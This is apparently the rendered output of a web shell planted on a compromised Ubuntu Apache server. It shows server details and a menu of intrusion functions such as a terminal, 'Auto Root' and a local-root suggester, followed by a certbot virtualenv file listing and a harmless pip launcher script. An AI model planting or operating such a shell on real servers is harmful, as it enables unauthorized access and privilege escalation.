Linux webserver 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov 6 17:42:15 UTC 2 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.1.1 & Your IP : 3.135.190.238
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
snap /
certbot /
4557 /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
Activate.ps1
8.82
KB
-rw-r--r--
2025-04-07 22:13
activate
2.1
KB
-rw-r--r--
2025-04-07 22:13
activate.csh
981
B
-rw-r--r--
2025-04-07 22:13
activate.fish
2.2
KB
-rw-r--r--
2025-04-07 22:13
certbot
215
B
-rwxr-xr-x
2025-04-07 22:13
distro
216
B
-rwxr-xr-x
2025-04-07 22:13
jws
215
B
-rwxr-xr-x
2025-04-07 22:13
normalizer
230
B
-rwxr-xr-x
2025-04-07 22:13
pip
225
B
-rwxr-xr-x
2025-04-07 22:13
pip3
225
B
-rwxr-xr-x
2025-04-07 22:13
pip3.12
225
B
-rwxr-xr-x
2025-04-07 22:13
python
7.66
MB
-rwxr-xr-x
2025-04-07 22:13
python3
7.66
MB
-rwxr-xr-x
2025-04-07 22:13
python3.12
7.66
MB
-rwxr-xr-x
2025-04-07 22:13
wheel
212
B
-rwxr-xr-x
2025-04-07 22:13
Save
Rename
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import re import sys from pip._internal.cli.main import main if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0]) sys.exit(main())